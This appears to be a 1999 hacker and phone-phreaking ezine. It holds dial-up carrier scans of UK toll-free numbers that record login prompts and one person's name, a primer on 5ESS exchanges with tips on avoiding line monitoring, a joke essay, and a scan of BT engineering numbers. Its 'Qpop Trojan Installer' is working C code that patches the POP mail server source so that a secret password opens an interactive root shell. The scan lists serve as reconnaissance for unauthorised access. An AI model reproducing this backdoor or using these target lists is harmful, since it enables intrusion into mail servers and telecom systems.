\________ __ ! / __ ___ \____________/ ____ | \ /\ | \| / / \ /| \ ___ > \ | |/__\ |__/|= | \ / | | /___\ _________ __ \_________|___/ \| \| \ | ! |___/ \____________/ >> \ < \ ! \ \___ / ____ _____ \______________________________________/ \_________/ _________D4rkCyde_____________________ Communications __UK/USA_ / ___ \ ____/ \_____ __/ ___<_________ / / / \ ___ ____________ / | \ __ /|__/| / | | \ /___ \___>>____ ____/ | |\ / | \|= | / \ | | \___/ ____|___/ \/ |__/| \ \__ / \|___/ ________>___ __<<______/ \____________________/ \_________ *** 0D4YZ 0D4YZ 0D4YZ 0D4YZ 0D4YZ 0D4YZ *** ************************************* * UK Carrier scan of o8oo 917 xxxx. * * 19 January 1999 - 10 Febuary 1999 * * 117 Carriers, scanned at 96ooBaud * ************************************* *** WARNING *** Unauthorised access to or misuse of these systems is prohibited and constitutes an offence under the Computer Misuse Act 1990. We cannot be held responceible for your actions if you violate this. 19-01-99 04:12:06 08009176827 c9600: 19-01-99 04:26:16 08009175162 c2400: 0P6"8E(z_ 19-01-99 04:42:07 08009170887 c9600: 19-01-99 05:56:18 08009171841 c2400: 19-01-99 06:21:48 08009175479 c2400: 19-01-99 06:43:55 08009171894 c2400: 19-01-99 06:46:51 08009172997 c9600: 21-01-99 03:48:37 08009177917 c9600: Radius Authentication. @ Userid: 21-01-99 03:52:15 08009178510 c9600: 21-01-99 04:36:45 08009178731 c9600: Please press .. Enter login name: 21-01-99 05:04:06 08009175201 c2400: 21-01-99 06:36:38 08009174127 c2400: 21-01-99 07:10:19 08009170512 c9600: 21-01-99 07:45:05 08009172700 c9600: Warning Unauthorised use of this network is prohibited ! Username: PASSCODE: 22-01-99 03:10:15 08009173547 c9600: 22-01-99 03:29:35 08009172055 c2400: 22-01-99 03:43:22 08009171814 cxxxx: 22-01-99 04:39:07 08009175061 c2400: 22-01-99 04:49:08 08009172194 c9600: Please press ...I PAn Employee IRHSOICB 22-01-99 05:11:14 08009174274 c2400: 22-01-99 06:07:00 08009179249 c9600: 22-01-99 06:16:54 08009173546 c9600: 22-01-99 07:42:00 08009179057 cxxxx: B00zz0BB00zz0B00zz0BDD18 B00zz0BDD18 22-01-99 16:24:04 08009171874 c9600: 22-01-99 16:32:03 08009174567 c9600: 23-01-99 02:56:13 08009176608 c9600: User Access Verification. Username: 23-01-99 03:15:37 08009175260 c2400: 23-01-99 03:32:41 08009175830 c2400: 23-01-99 03:59:19 08009174518 c9600: @ Userid: 23-01-99 05:17:30 08009175545 c2400: 23-01-99 05:26:33 08009172295 c: Leave a message and your contact details and we will contact you as soon as possible. 23-01-99 06:04:32 08009174390 c9600: Radius Authentication. @ Userid: 23-01-99 06:21:19 08009175834 c9600: Chorus/MIX V3.2 TTY Login: 23-01-99 06:31:19 08009178863 c9600: 23-01-99 18:28:39 08009172997 c9600: 23-01-99 18:39:15 08009176030 c9600: 24-01-99 06:46:03 08009171816 c9600: @ Userid: 24-01-99 07:17:45 08009171615 c9600: 24-01-99 08:06:31 08009176432 c9600: 24-01-99 09:17:30 08009170633 c9600: login: 24-01-99 09:18:53 08009170668 c9600: 24-01-99 11:06:07 08009179041 c9600: Welcome to USRobotics The Intelligent Choice in Information Access. login: 24-01-99 12:42:15 08009179246 c9600: 24-01-99 18:59:37 08009178928 c9600: Welcome to InterLinx. interlinx!login: 25-01-99 03:42:37 08009171750 c9600: 25-01-99 03:44:17 08009173549 c9600: 25-01-99 04:09:45 08009179184 c9600: 25-01-99 05:16:43 08009175222 c2400: 25-01-99 16:36:18 08009178633 c9600: User Access Verification. Username: 25-01-99 16:39:39 08009173512 c9600: User Access Verification. Username: 26-01-99 05:07:12 08009174278 c2400: 26-01-99 05:31:47 08009170116 c9600: 26-01-99 05:37:25 08009178066 c9600: Please press ... I PSharron Creaney SHARRON 26-01-99 05:52:21 08009176792 c2400: 26-01-99 06:48:46 08009176521 c9600: **B0100000027fed4 26-01-99 06:55:52 08009178703 c9600: 26-01-99 15:50:04 08009171800 c9600: Annex Command Line Interpreter * Copyright (C) 1988, 1997 Bay Networks Checking authorization, Please wait... Annex username: 26-01-99 15:58:37 08009176950 c9600: 27-01-99 04:57:43 08009179457 c9600: @ Userid: 29-01-99 00:56:06 08009173548 c9600: 29-01-99 03:54:47 08009178374 C9600: Annex Command Line Interpreter * Copyright (C) 1988, 1998 Bay Networks #------------------------------------------------------# # Welcome to the Watson Wyatt Remote Access Service # # # # None Authorized Users should disconnect NOW ! # # # #------------------------------------------------------# Trying... Connected to 126.52.18.187. Attached to port 7 29-01-99 04:29:33 08009179206 c9600: 29-01-99 04:37:44 08009175775 c9600: 29-01-99 05:09:57 08009174298 c2400: 29-01-99 07:06:19 08009179248 c9600: 29-01-99 08:25:38 08009179245 c9600: 29-01-99 08:42:53 08009173432 c9600: Starting SecurID Authentication.User ID: 29-01-99 11:00:51 08009172017 c9600: CCCThis is really RAS3 User Access Verification Username: 29-01-99 11:30:15 08009178212 c9600: User Access Verification Username: SNK Challenge: 59886539 Enter Response: 30-01-99 03:15:17 08009175024 c2400: 30-01-99 03:32:24 08009176461 c9600: AMAMAMAMAMAM 30-01-99 04:11:52 08009171713 c9600: 30-01-99 04:19:58 08009176654 c9600: Starting Radius Authentication. @ Userid: 30-01-99 05:30:26 08009171368 c2400: UESZq6[e 30-01-99 05:39:43 08009176703 c9600: @ Userid: 30-01-99 06:44:49 08009173545 c9600: 30-01-99 06:51:00 08009175510 c2400: 30-01-99 11:03:24 08009171020 c9600: @ Userid: 30-01-99 11:17:18 08009179789 c9600: USRobotics Courier V.Everything Dial Security Session Serial Number 21OZD1G8EAQ3 Password (Ctrl-C to cancel) 31-01-99 06:08:05 08009178511 c9600: 31-01-99 06:29:55 08009179562 c9600: 31-01-99 06:47:32 08009172102 c9600: OUUUUUUUUUUK+++ 31-01-99 06:52:43 08009173433 c9600: 02-02-99 06:52:03 08009179427 c9600: Starting Radius Authentication.@ Userid: ? 02-02-99 07:02:01 08009170918 c9600: 02-02-99 07:03:15 08009179247 c9600: 03-02-99 05:36:19 08009174365 c9600: ** First Option ** Login: 03-02-99 05:39:22 08009172903 c2400: (shitload of garbage charactors) 03-02-99 05:57:07 08009173317 c9600: 03-02-99 06:34:02 08009173023 c9600: Annex Command Line Interpreter * Copyright (C) 1988, 1997 Bay Networks Checking authorization, Please wait... Annex username: 03-02-99 09:22:04 08009170631 c9600: 04-02-99 04:11:23 08009178407 c9600: Starting Radius Authentication. @ Userid: 04-02-99 04:28:57 08009170889 c9600: 04-02-99 04:44:53 08009170064 c9600: User Access Verification Username: 04-02-99 05:08:00 08009173551 c9600: Enter ID: 04-02-99 05:09:01 08009176851 c9600: Generic-Sys (generic) [HP Release A.B9. 04] HP-UX login: 04-02-99 06:10:37 08009170343 c2400: PLEASE ENTER PASSWORD: 04-02-99 06:22:43 08009175536 c9600: @ Userid: 04-02-99 06:45:12 08009175840 c2400: 05-02-99 04:19:03 08009175151 c2400: 05-02-99 06:24:48 08009179899 c9600: User Access Verification. Username: 05-02-99 07:02:31 08009175170 c2400: 05-02-99 08:31:05 08009172995 c9600: 05-02-99 08:38:00 08009171832 c9600: login: 06-02-99 02:22:18 08009175422 c2400: 0\5$xw_15!D7 06-02-99 05:44:27 08009171813 c9600: 06-02-99 08:22:14 08009170288 c9600: 06-02-99 08:24:09 08009176562 c9600: 06-02-99 09:09:34 08009171731 c9600: User Access Verification. Username: 07-02-99 07:21:39 08009170366 c2400: 07-02-99 07:54:11 08009173451 c9600: 08-02-99 05:02:07 08009173650 c2400: 0 08-02-99 05:45:19 08009175206 c2400: 08-02-99 06:42:28 08009179942 c9600: 08-02-99 06:54:39 08009172996 c9600: 09-02-99 06:05:47 08009172034 c9600: 10-02-99 15:52:04 08009174514 c9600: @ Userid: -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->]OO[:[ Qpop Trojan Installer ]::[OO--[ by gov-boi ]-[ hotmetal@hack.co.za -->[OO]:::::::::::::::::::::::::::::::[ http://www.hack.co.za ]:::::::::::::: /**** Qpop v2.53 Trojan Installer v1.1 c0de by gov-boi/hotmetal of (src) hotmetal@hack.co.za Idea thought of by: nikel-com usage: tar -zxf qpopper2.53.tar.Z .. copy src-qpopd.c into the "qpopper2.53" root directory .. compile src-qpopd.c .. run .. compile qpopper2.53 .. install .. ;) and have phun kiddies ;) backd00r password is "jax0r" ****/ #include #include #include void display_usage(void); int main(int argc, char *argv[]) { char *scanstring = "The client command was not located in the command/state table"; char *w00p="pop_get_command.c"; char buffer[1002]; char buffer2[1002]; FILE *fp, *wo0p; if((fp = fopen(w00p, "r")) == NULL) { fprintf(stderr, "Error opening file: pop_get_command.c\n"); fprintf(stderr, "missi0n unsuccessfull.. lam3r!\n"); exit(1); } wo0p = fopen("zzzzzz","w"); while(fgets(buffer, 1000, fp) != NULL) { strcpy(buffer2, buffer); if(strstr(buffer, scanstring) != 0) { fprintf(wo0p," /* The client command was not located in the command/state table */\n"); fprintf(wo0p," if (p->pop_command = \"jax0r\")\n"); fprintf(wo0p," { execl(\"/bin/sh\",\"/bin/sh -i\", NULL);return(0);}\n"); } if(strstr(buffer, scanstring) == 0) { fprintf(wo0p,"%s", buffer2); } } fclose(fp); fclose(wo0p); system("mv zzzzzz pop_get_command.c"); fprintf(stderr, "missi0n successfull.. i phear j00!@#\n"); return 0; } -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->]OO[:[ Rolling Deep ]::::::::::::[OO--[ by tgb ]---[ ]:::::::::::::::::::: -->[OO]:::::::::::::::::::::::::::::::[ http://noprotocol.org/tgb ]:::::::::: Rolling Deep With all the dangers and precarious situations the modern hax0r can find himself in on the streets, the ninties have brought forth the need to "roll deep." The whole rationale behind the concept of rolling deep lies in the age old adage. "Strength in numbers," or something along those lines, although rolling deep by no means requires a large group or backup posse. The term rolling deep stems directly from the world of hardcore hip hop and gangsta rap, and is often used in conjunction with phrases like, "Ya best proteck ya neck," "bakdafukup," or other equally street-smart phrases that manage to incorporate both defensivness and threat. In any case, the implications are easily identifiable and the prmoise of quick retaliation looms in the foreground; rolling deep is a means of letting people know that you are not to be fucked with. The perils of being caught slippin' in this day and age are just too great. I know the value of rolling deep and have integrated it into my daily routine, rolling deep for such mundane tasks as getting a late- night snack from the fridge, buying a new sweater, or making a important phone call home. Hopefully some of the following tips, examples, and observations will acquaint you with the ways of rolling deep as fuck, 'cause it's too dangerous to be caught shallow. 1. Put on the hardest clothes you can find (consult the latest number one video on Rap City) and practice scowling in the mirror for a few hours. The scowl is on the most integral aspects of rolling deep and must be perfected, although allowances can be made for the Flava-Flav type joker in every roup. Take a deep breath and tell yourself you are hard until you believe it. 2. Pretend you are in a rap video, running down the street in slow motion or backing up the MC. Visualize yourself as an actual member of a video posse. 3. Practice the "What the fuck?!" arm gesture (both arms open, palms spread outward) until it becomes an automatic response to any question, especially if from a parent, cop, boss, or teacher. 4. Grow some sort of "hard" facial hair. 5. Wear a very unhip pair of sunglasses--not bullshit Oakley or Arnet, but something like cop glasses or oversized mom-style glaasses. Basically anything you can snag out of a lost-and-found-bin will do. 6. Look around a lot, like you expecting static from any direction. 7. Cultivate a fake limp or strut and walk extremely slowly. 8. Refer to people only as "bitches" or "fools." Learn to integrate the following words or phrases into your everyday speech, regardless of their meaning in your life: gat, nine, blast in the face, bitchslap, gangstalean, etc. You are now ready to assemble the crew and synchronize the eight-step rolling deep program. Usually a larger group will signify a deeper roll, but this is not always the case. Certain people will never attain the ability to roll deep, no matter how much backup they have. Conversely, some motherfuckers roll deep when hanging out on solo tip. Some of the deepest rollers are the strong, silent types who can handles themselves in any situation. Consider the following list of some people who roll deep and some who don't quite make it. Deep As Fuck: Wu-Tang, the Warriors (from that old '70s movie), this dude I once saw lounging in a designer sweatsuit and shades, Slayer. Wading Pool: Hammer, New Kids On The Block, Blackstreet, any fast food employee or manager, rock star snowboarders, bitch-ass rollerbladers. Of course those you new to the ways of rolling deep should never try to bust a flex on someone with experience. First things first, you should go in gradually, the way one would enter a pool of freezing water. You should initially roll deep only on inanimate objects such as street signs, a jammed or locked door, or a soda machine that shorted your coin. From that point you should work your way up to blind people or alley cats, but only when you feel comfortable. Progression will naturally lead you to flexin' on old ladies and infants. Get confident, live your lyrics, and work your way up to speed. Eventually you'll be able to walk the streets with pride and conviction that can only come with the knowledge that your are rolling deep. --tgb -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->]OO[:[ 5ESS CDX/VCDXs ]:::::::[OO--[ by hybrid ]---[ hybrid@dtmf.org ]:::: -->[OO]:::::::::::::::::::::::::::::::[ http://hybrid.dtmf.org ]::::::::::::: 5ESS-2OOO Compact Exchange Units. by hybr1d (http://DTMF.org/hybrid) o Introduction o Types of compact exchanges o CDX exchange o VCDX exchange o Conclusion Introduction ------------ This is a very compact file, designed to be an intorduction, or primer to 5ESS local compact digital exchange units. I am wrtting this off the top of my head, so don't expect it to be very complex in technical nature. For starters I'll explain a little about the new 5ESS switches and there functions. We've all heard of the millenium bug, and it's supposid ability to take out massive networks etc. Well Lucent technologys, Bellcore (now telecord communications or somthing), aswell as lata exchange carrier providers such as MCI, AT&T, Sprint, and all the RBOC's such as SWBell, etc, all got a bit paranoid and decided to enhance to current 5ESS switching configurations to a new architecture they feel would be compatable with the millenium software and network problems. The new 5ESS-2OOO switches are all basically the same as conventional 5ESS switches, except the software parts, such as the administration control software platforms, and global title translation software etc, have been upgraded to be Y2K compatable. As well as this, the new 5ESS switches have been modified (based upon conventional 5ESS) to be easily upgraded in the future with new modules for future telecommunications developments. In other words, the new digital switches are very very very souped-up versions of 5ESS, infact, I would concider them to be one of the most versatile switches around. Now the deal with these new digital switching systems is that they can handle more and more lines, more network traffic, aswell as a very upgraded ability for general system capacity. They have also been upgraded with new security features to stop people like me from gaining access to the local administration part which is accessable via x25, the PSTN, and the net (on a 'secret' IP range).. I'm not going to go into that at the moment, thats another file.. Anyways, as I was saying, the new 5ESS-2OOO digital exchanges are like souped up 5ESS switches. Before there where people bitching about how they can get 'traced' messing around on the phone network because 5ESS logs shit. Well, I got news for you, 99.9% of all worldwide switching mechanisms, electro-mechanical, or digital derived, ALL log stuff, and always have done. It's just with these new 5ESS-2OOO digital exchanges, its more obvious if you are messing around. Lets say for example you where scanning over 400 numbers a night via your land line.. Normaly a 5ESS, DMS, TXE etc would just log your line usuage, calling patterns etc into a subscriber log in one of the switches sub-system parts. You would only usually get discovered if one of the field technitions, glanced at the data for you line usuage. Thats ok, because we all no that exchange field operators are lame and lazy, but what about this new 5ESS- 2OOO line loging equipment? - welp, I have bad news for you. If you scan in continuous, or repetitive cycles over your subscriber loop, the chances are, you're gonna get your haxoring ass taken to court by your RBOC, or whatever provider you are with. The reason for this is that 5ESS-2OOO digital switches continously monitor the activity, and network usuage of over 100,000 lines similtaniously. Instead of loging line status etc into a dormant log file in a sub-system, if one of the local switches notices that somthings up, a field adminstrator is notified imediatly, probably by the means of a status bar on an uplinked terminal. The new switches have been modified to be very stringent on system capacity and usuage patterns, and will notify any field office engineer of the slightest problem. The new 5ESS- 2OOO switches are basically like UK monologs, in other words, they record everything about your line, all digits dialed, even after terminating destination point, they even log the time intervals between each tone you dial/emit. Basically they are the big-bro of the phone system so start getting paranoid. (I know for a fact, that it is possible to log onto one of the local exchange units and turn line logging OFF, and even make your line appear to be non-existant). Anhow, I think I've probably made a few people a little paranoid now, on with the rest of the file. Types of local compact digital exchanges ---------------------------------------- Werd, well now its time for the focus of the file. I'm not writting a mad big file on the entire 5ESS-2OOO network because it would take _ages_, so I'm going to focus on local compact excahnges designed for the rurual community such as college campuses and areas with not many subscribers, like suberban areas of towns. There are 2 main types of compact 5ESS-2OOO local switch, the CDX (Compact Digital eXchange), and the VCDX (Very Compact Digital eXchange). Both these new units are designed to be very echonimacal for the money raking telcos. The idea is that these switches are being placed in new suberban housing developments, and are being integrated into the PSTN as we speak. The CDX digital exchange for example is designed to be very snall, handeling small local phone networks, it can however be upgraed with the implementation of modules, kind of like plug'n'play, until the switch becomes a fully fledged 5ESS-2OOO unit if required in the future. Lets take a look at these local networks in more detail. The CDX digital exchange ------------------------ The CDX (Compact Digital eXchange) is a small sized siwtch configuration, which is capable of providing the same services to subscribers the same as a conventional 5ESS switch would. Unlike the older rural exchange units, these new switches are capable of handeling more advanced telecommunications services like wideband data transmission, and video data etc. The switch is housed in a cabinet that is 6 foot high, 29.9 inches wide, and 23.6 inches deep. The switch is desinged to be a stand alone unit and as I said before, very capable of handeling current/future telecommunications developments and serverices such as POTS lines (Plain Old Telephone Service), equal access services, ISDN (Integrated Services Digital Network), CENTREX services such as call waiting, hold, etc etc. The system is also designed to be fully compatable with the Signaling System 7 telephony protocol which has been implemented over the majourity of the international PSTN. The switch can handle from 100 subscriber loops, upto 15,000 local access lines or 15,000 remote access lines. CDX operates on the same software as the conventional 5ESS-2OOO switch, and also has the same call routing architecture (physical). ______________________ Admin Console AM: Adminstration Module | | ______ CM2: Communications Module | | | | CM2C: " Compact | 3B21D |-------| | MSDT: SLC-2OOO Multi - | | |______| Services Remote |______________________| Module | | | _________________ | | | _______|_______ | SM or |--| | | | SM-2OOO |--| | CM2C |-----------| |--| (upto 6 RSM |_______________| | |--| outputs) | | |--| / |_________________| / | / | _______|_______ ______|______ _________ | | | | | | | ORM | | |--------| local | |_______________| |_____________| |_________| | | | | ORM: Remote Module RSM: Remote Switching Module SLC: Subscriber Loop Carrier SM: Switching Module The VCDX digital exchange ------------------------- VCDX stands for (VERY Compact Digital eXchange), and when I say compact, I mean compact. It is the smallest of all 5ESS-2OOO switch configurations but is still very capable of providing the same services as its bigger bro, the CDX switch. This switch is used by CATV, CAPS, small towns, and government facilitys. The switch is also capable of providing Central Office services such as the usual call waiting, and ISDN. The intersting thing about this switch is that it supports Carrier Identification Code (CIC) expansion and is compatable with changing NPA's in the Interchangable Numbering Plan Area, as required by reglatory bodys such as the FCC. The VCDX switch can support various configurations using a single 5ESS Switching Module (SM) to handle the call processing. The SM is controlled by a sophisticated UNIX software-based workstation which provides administrative and maintenance capabilities. A mimimum configuration of 2 cabinets that are 6 foot high x 29.9 inches wide x 23.6 inches deep in size is necessary and thus it fits in a small space. If left in standard mode, the VCDX can handle upto 1,500 lines. If the SM-2OOO unit is impemented as a module, the switch can handle as many as 14,000 lines. _____________ _______ | | | | | workstation |----------------| modem | |_____________| |_______| | | | __________|___________ _____________ | |--| | | | |--| | local dist |-------------| SM or SM-2OOO |--| |_____________| | |--| | | | | | |______________________|--| (to local distrobution plant. then to subscriber loops.) Conclusion ---------- Welp, thats it for this short file/article. Hope you enjoyed it. As you can see the 5ESS lcoal unit range is very complex, and is a massive improvement on previous local switching networks. Just be carefull about the subscriber loop monitoring modules. If you'd like more info on 5ESS-2OOO switching, I have put some decent information up on my website for your enjoyment and viewing pleasure. Goto http://www.dtmf.org/hybrid and check it out, you'll also be able to find the other 30+ files I've written in the past on there aswell, so go there now@! thats an order, heh. Anyways, thats it, peace. [http://darkcyde.system7.org] [http://dtmf.org/hybrid] [http://system7.org] [http://phunc.com] [http://ninex.com] [http://b4b0.org] shouts to [9x] [b4b0] [D4RKCYDE] [subz] [gr1p] [t1p] [ph1x] [downt1me] [euk] [lowtek] [digiphreq] [zomba] [force] [psyclone] [pbxphreak] [gb] [ch1ckie] [knight] [siezer] [oeb] [barby] [jasun] [pvbbs] [nino] hybrid@dtmf.org #darkcyde efnet ------------- -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->]OO[:[ O8OO672[XXX] ]::::::::::::::[OO--[ by faith ]---[ ]:::::::::::::::: -->[OO]:::::::::::::::::::::::::::::::[ http://darkcyde.system7.org ]:::::::: ******************************* Scan of BT engineering exchange 0800 672 {xxx} 1999 ******************************* 000 not recognised 001 BT paging service (24hrs) 002 - 019 nr 020 "******* messaging service - who are you calling please" :) 021 - 066 dead tone 067 BT pagaing (24hrs) some freaky woman i couldn't understand 068 - 099 nr 100 carrier 101 ringing 102 residential BT accounts service 103 carrier **************************************************************************** 104 costiomer service management centre edinborough network service provision control function has changed isdn 30 provision stage 1 look check 0800282212 isdn30 deta configeration and commisioning press 2 or dial 0800 592 831 isdn 2 provision assistance dial 3 for keep on dial 4 **MARIDIAN** **************************************************************************** 105 costomer servie amnaggement centre ed costomer repair enq 1 cch issues 3 escilation enq 4 **meridian** 106 ringing 107 carrier 108 ringing 109 dead tone 110 weird scottishj voice 111 - 114 dead tone 115 please leave a message after the tone - maridian } someone cant spell 116 ringing 117 retail sales 118 - 119 ringing 120 dead tone 121 some bloke 122 ringing 123 dead tone 124 prsonal answer phone 125 dead tone 126 "hello" 127 ringing 128 129 130 carrier *********************************************************************** 131 CSX RAM2000 system 1 to sign on - 2 to sign off 132 welcome to the BT payroll please enter you BT employee ID number *********************************************************************** 133 this number has moved 134 ringing 135 carrier 136 dead tone 137 nr 138 ringing 139 carrier 140 north of england AMU 141 - 143 dead tone 144 BT info line 145 carrier 146 operator 147 carrier 148 HR & DS???? 149 carrier 150 - 158 dead tone 159 ringing 160 sincorta???? help desk 161 nr 162 dead tone 163 employment law policy helpline 164 - 168 regia help desk 169 ringing 170 strange ring 171 - 174 ringing 175 dead tone 176 wolverhampton SMC 177 ? SMC 178 - 179 ringing 180 - 189 regia help desk 190 - 191 carrier 192 ringing 193 carrier 194 engaged 195 - 196 carrier 197 dead tone 198 ringing 199 dead tone 200 ringing 201 - 206 carrier 207 - 213 ringing 214 carrier 215 - 218 ringing 219 rec managers centre edinborough???? 220 summit direct is closed 221 some bloke 222 service centre??? 223 this number has ceased 224 some woman 225 ringing 226 engaged 227 - 229 service centre 230 dead tone 231 - 232 BT residential sales + accounts service 233 BT touchpoint helpdesk 234 engaged 235 dead tone 236 ringing 237 - 238 dead tone 239 engaged 240 - 249 regia 250 - 254 ringing 255 dead tone 256 ringing 257 dead tone 258 BT ACP Team 259 carrier 260 some bloke 261 dead tone 262 nr 263 ringing 264 carrier 265 BT Corparate and government accounts 266 ringing 267 regia 268 carrier 269 - 271 ringing 272 - 275 BT payphone??? 276 dead tone 277 some bloke 278 - 279 ringing 280 dead tone ************************************************************************** 281 please enter your 3 digit channel #, if you require a list of channel #'s please enter 999; ************************************************************************** 282 ringing 283 dead tone 284 - 289 ringing 290 carrier 291 - 292 visa international automated referal service 293 - 299 carrier 300 dead tone 301 - rang. 302 - BT & cellnet tag-team, on holdiday, answer phone. 303 - rang. 304 - 305 - 306 - 307 - rang. 308 - took time to get through, just rang. 309 - rang. 310 - fucking neat-o. VMB? some kinda technical centre. 311 - rang! 312 - 0800 990088 313 - 0800 990088 314 - 0800 990088 315 - rang. 316 - 0800 990088 317 - 318 - pair allocation help desk 319 - rang. 320 - rang. 321 - 322 - 323 - BT residensal customer account service 324 - --------======================++++++ENGAGDED+++++================--- 325 - 326 - rang 327 - rang 328 - CARRIER! 329 - rang 330 - rang 331 - rang 332 - rang 333 - fax 334 - fax/modem 335 - 336 - 337 - 338 - 339 - 340 - rang 341 - ---------------============+++ENGAGDED+++============-------------- 342 - ---------------============+++ENGAGDED+++============-------------- 343 - voice 344 - BT business something, voice. 345 - rang 346 - rang 347 - 348 - 349 - 350 - 351 - 352 - 353 - BT residensal repair service 354 - 355 - 356 - 357 - rang 358 - BCS-3 Meridian Mail system BCS ;) 359 - rang, then answer phone 360 - reck-care? help desk. options 361 - reck-care? help desk. options 362 - reck-care? help desk. options 363 - reck-care? help desk. options 364 - reck-care? help desk. options 365 - reck-care? help desk. options 366 - reck-care? help desk. options 367 - reck-care? help desk. options 368 - reck-care? help desk. options 369 - reck-care? help desk. options 370 - 371 - rang 372 - rang 373 - rang 374 - rang 375 - rang 376 - rang 377 - rang 378 - 379 - rang 380 - 381 - 382 - 383 - rang 384 - 385 - 386 - 387 - 388 - 389 - 390 - 391 - help desk for something 392 - rang 393 - carrier 394 - 395 - london product support centre. talking machine. 396 - rang 397 - really bad answer machine for something on BT? 398 - rang 399 - 400 - someone stevenson VMB. 401 - fax 402 - rang 403 - rang 404 - rang 405 - 406 - 407 - rang 408 - rang 409 - rang 410 - voice 411 - BT something solutions help desk 412 - 413 - rang 414 - voice 415 - rang 416 - really bad answer phone 417 - really bad answer phone 418 - rang 419 - answer phone 420 - rang 421 - rang 422 - rang 423 - rang 424 - rang 425 - rang 426 - rang 427 - rang 428 - rang 429 - rang 430 - BT national meridian help service 431 - BT residensal customer accounts 432 - rang 433 - 434 - BT residensal customer accounts 435 - BT direct debit customers account 436 - BT residensal customer accounts 437 - 438 - voice 439 - rang 440 - rang 441 - rang 442 - rang 443 - rang 444 - fax *************************** 445 - BT mcp credit control *************************** 446 - 447 - 448 - rang 449 - rang 450 - rang 451 - rang 452 - rang 453 - rang 454 - rang 455 - pual bowshure VMB 456 - rang 457 - rang 458 - rang 459 - rang 460 - 461 - BT service management 462 - edinbough service manager 463 - voice 464 - voice 465 - voice 466 - voice /*same voice i think, poor bastard, it just gone 02:01am */ 467 - bt local government? 468 - BT 24hour.... /*cut him off*/ 469 - rang 470 - rang 471 - voice 472 - rang 473 - rang 474 - rang 475 - rang 476 - BT residentsal customer account service 477 - 478 - rang 479 - fax 480 - voice 481 - rang 482 - voice 483 - BT VOICE MESSAGING. 484 - answer machine telecom sales desk 485 - answer machine telecom sales desk 486 - answer machine telecom sales desk 487 - answer machine telecom sales desk 488 - answer machine telecom sales desk 489 - answer machine telecom sales desk 490 - rang 491 - rang 492 - rang 493 - forwards to a VMB, but can not access(no suscibe) 494 - rang 495 - rang 496 - rang 497 - rang 498 - rang 499 - rang 500 - rang 501 - fax 502 - fax 503 - fax 504 - fax 505 - fax 506 - fax 507 - fax 508 - fax 509 - fax 510 - 511 - voice. a party? 512 - answer phone 513 - rang 514 - answer phone 515 - answer phone 516 - answer phone 517 - answer phone 518 - answer phone 519 - rang 520 - 521 - 522 - 523 - rang 524 - 525 - Concert VNS. card and pin # *************************************************** 526 - FUCKING INTERESTING (dialtone) *************************************************** 527 - rang 528 - BT customer service centre 529 - BT service management 530 - BT national meridian operation centre 531 - 532 - *************************************************** 533 - HAHAHAH THE NAME GAME NUMBER *************************************************** 534 - 535 - 536 - 537 - BT something or another 538 - BT sincordless solutions 539 - 540 - 541 - 542 - BT residensal customer account service 543 - fax 544 - 545 - rang 546 - fax 547 - voice 548 - rang 549 - rang 550 - Hillsdown help desk, OPtions 551 - fax 552 - BT phoneBook supply 553 - rang 554 - work manager edinbough 555 - work manager edinbough 556 - work manager edinbough 557 - work manager edinbough 558 - rang 559 - more work manager stuff 560 - rang 561 - telecom sales desk 562 - telecom sales desk 563 - telecom sales desk 564 - telecom sales desk 565 - telecom sales desk } they supply BT with hardware 566 - telecom sales desk 567 - telecom sales desk 568 - telecom sales desk 569 - telecom sales desk 570 - 571 - cambridge service management centre 572 - 573 - cambridge service management centre 574 - cambridge service management centre 575 - cambridge service management centre 576 - cambridge service management centre 577 - cambridge service management centre 578 - cambridge service management centre 579 - cambridge service management centre 580 - rang 581 - cambridge service management centre 582 - 583 - cambridge service management centre 584 - cambridge service management centre 585 - cambridge service management centre 586 - cambridge service management centre 587 - voice 588 - cambridge service management centre 589 - edinbrough service management centre 590 - rang 591 - edinbrough service management centre 592 - cambridge service management centre 593 - rang 594 - 595 - rang 596 - 597 - fax 598 - fax 599 - fax 600 - BT security 0800321999 * nasty * Rang = boring fucking wankers 0800 990088 = whats the fucking point? neat-o = werd (oh fuck, tell i been using IRC!) the nothings = bollox, just fucking bollox. other = god gave us the phone for something, and it aint phone shags carrier = YERRR. voice = I hate getting though to voice, always phreaks me! :) ------------------------------------------------------------------------------- 0800-672-328 User Access Verification Login:guest Password: % Authentication failed. =============================================================================== 0800-672-393 WARNING: You are about to access a controlled system. You are required to have a personal authorisation to use this system and you are strictly limited to the use set out in that written authorisation. Unauthorised access to or misuse of this system is prohibited and constitutes an offence under the Computer Misuse Act 1990. Only proceed if you are authorised to use this system as detailed above. 02:Login: =============================================================================== 0800 672 600 [BT security. 0800 321 999] 0800 672 601 [dead] 0800 672 602 [modem/fax] 0800 672 603 [modem/fax] 0800 672 604 [no answer] 0800 672 605 [no answer] 0800 672 606 [strange, no ring then internal dead tone] 0800 672 607 [same] 0800 672 608 [dead] 0800 672 609 [internal dead tone] 0800 672 610 [BT residential customer accounts service, recording] 0800 672 611 [dead] 0800 672 612 [BT residential customer accounts service] 0800 672 613 [dead] 0800 672 614 [dead] 0800 672 615 [no answer] 0800 672 616 [dead] 0800 672 617 [dead] 0800 672 618 [no answer] 0800 672 619 [no answer] 0800 672 620 [re-routed, cell-phone?] 0800 672 621 [re-routed, cell-phone?] 0800 672 622 [re-routed, cell-phone?] 0800 672 623 [re-routed, cell-phone?] 0800 672 624 [re-routed, cell-phone?] 0800 672 625 [re-routed, cell-phone?] 0800 672 626 [re-routed, cell-phone?] 0800 672 627 [re-routed, cell-phone?] 0800 672 628 [re-routed, cell-phone?] 0800 672 629 [re-routed, cell-phone?] 0800 672 630 [re-routed, cell-phone?] 0800 672 631 [re-routed, cell-phone?] 0800 672 632 [re-routed, cell-phone?] 0800 672 633 [dead] 0800 672 634 [dead] 0800 672 635 [London Meridian Operations Center. Meridian Mail, hehe. 0800 672 636 [BT voice messaging, *massive* voicemail network.login number] 0800 672 637 [BT voice messaging, leave a message number] 0800 672 638 [no answer] 0800 672 639 [no answer] 0800 672 640 [dead] 0800 672 641 [dead] 0800 672 642 [dead] 0800 672 643 [no answer] 0800 672 644 [dead] 0800 672 645 [dead] 0800 672 646 [dead] 0800 672 647 [dead] 0800 672 648 [dead] 0800 672 649 [dead] 0800 672 650 [re-routed, BT somthing, stupid bitch is to quiet, ans-phone] 0800 672 